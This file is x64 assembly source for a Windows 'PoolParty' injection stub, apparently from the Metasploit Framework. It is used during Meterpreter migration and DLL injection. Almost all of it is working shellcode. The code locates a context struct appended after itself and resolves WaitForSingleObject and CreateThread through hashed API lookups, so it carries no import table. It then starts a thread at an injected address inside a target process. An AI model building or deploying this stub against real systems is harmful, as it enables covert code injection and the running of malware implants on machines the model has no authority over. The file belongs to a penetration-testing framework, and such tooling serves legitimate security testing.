GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/shellcode/windows/x64/src/migrate/poolparty.asm
;-----------------------------------------------------------------------------;
; Author: Diego Ledda (diego_ledda[at]rapid7[dot]com)
; Compatible: Windows 11, 10
; Architecture: x64
; Version: 0.4 (July 2024)
; Size: 276 bytes
; Build: >build.py poolparty
;-----------------------------------------------------------------------------;
; Stub helper for pool-party injection.
;typedef struct _POOLPARTYCTX
;{
; union
; {
; LPVOID lpStartAddress;
; BYTE bPadding1[8];
; } s;
; union
; {
; LPVOID lpParameter;
; BYTE bPadding2[8];
; } p;
; union
; {
; LPVOID hEventTrigger;
; BYTE bPadding2[8];
; } e;
;
;} POOLPARTYCTX, * LPPOOLPARTYCTX;
; Description:
; This stub is executed during the Meterpreter migration and DLL Injection. The POOLPARTYCTX must ALWAYS be allocated at the end of the shellcode;
; this is mandatory because some pool-party variants do not support argument passing. An hEventTrigger during migration is also mandatory because
; we need to wait for the OK from the previous Meterpreter before continuing execution. With other techniques (RemoteThread and APC)
; we start the process in SUSPENDED mode and then resume it; here we have to wait on an event instead.
; This shellcode is designed to work with multiple PoolParty variants.
; Supported Variants:
; - TP Direct Insertion
[BITS 64]
[ORG 0]
;-----------------------------------------------------------------------------;
; Entry point of the stub (see the description above for how it is reached).
; Register roles for the whole stub:
;   rdi  = rsp as it was on entry (restored unconditionally in 'cleanup')
;   rsi  = LPPOOLPARTYCTX, the context appended directly after this code
;   rbp  = address of 'api_call' (block_api.asm), used for every API call
;   r10d = hash of the API that 'api_call' has to resolve
; API resolution goes through the hashed lookup in block_api.asm, so the stub
; carries no import table; what the target process observes is a
; WaitForSingleObject on ctx->hEventTrigger followed by a CreateThread on
; ctx->lpStartAddress.
;-----------------------------------------------------------------------------;
cld ; Clear the direction flag.
push rbp ; Preserve the callee-saved registers this stub reuses (Win64 ABI)
push rdi
push rsi
mov rdi, rsp ; Saves RSP to RDI; 'cleanup' restores it from here instead of rebalancing per call
jmp _parameters ; Get the POOLPARTYCTX after the shellcode: the 'call' at _parameters pushes
; the address of the byte following the last instruction, which is where the
; context is appended.
_cb_parameters: ; Unfortunately, in some PoolParty variants we cannot receive parameters,
; so the context is located through the return address instead.
pop rsi ; RSI = POOLPARTYCTX (the return address pushed by 'call _cb_parameters')
sub rsp, 0x78 ; Alloc some space on stack.
; NOTE(review): the amount also determines the alignment the called APIs see
; relative to the entry rsp; presumably chosen for the supported trigger path --
; confirm before adding variants that enter the stub differently.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
%include "./src/block/block_api.asm" ;
start:
pop rbp ; Pop off the address of 'api_call' for calling later.
mov ecx, [rsi+16] ; Get hEventTrigger (offset 16 = union 'e'). The 32-bit load zero-extends
; into rcx; relies on the HANDLE value fitting in the low dword.
xor rdx, rdx ;
dec edx ; Decrement rdx down to -1 (INFINITE): edx = 0xFFFFFFFF, upper half stays zero
mov r10d, 0x601D8708 ; hash( "kernel32.dll", "WaitForSingleObject" )
call rbp ; WaitForSingleObject(hEventTrigger, INFINITE);
; Blocks until the previous Meterpreter signals that it is safe to continue.
; rsp is deliberately not rebalanced here: 'cleanup' restores it from rdi.
xor rdx, rdx ; zero RDX, dwStackSize = 0
mov r8, [rsi] ; r8 = ctx->lpStartAddress
mov r9, [rsi+8] ; r9 = ctx->lpParameter
xor rcx, rcx ; Clear ECX, lpThreadAttributes
push rcx ; lpThreadId (6th arg, on the stack; pushed first so it sits higher)
push rcx ; dwCreationFlags (5th arg, pushed last so it is nearest the call)
mov r10d, 0x160D6838 ; hash( "kernel32.dll", "CreateThread" )
call rbp ; CreateThread( NULL, 0, ctx->lpStartAddress, ctx->lpParameter, 0, NULL );
cleanup:
mov rsp, rdi ; Restore Stack: drops the two pushed stack args, the 0x78 scratch area
; and whatever api_call left below, without per-call accounting.
pop rsi
pop rdi
pop rbp
ret ; rax still holds CreateThread's return value (thread HANDLE or NULL)
_parameters:
call _cb_parameters ; Simple way to get the address of the POOLPARTYCTX using the return address.
; This must remain the last instruction of the stub: the pushed return address
; is the first byte after the code, i.e. the POOLPARTYCTX itself.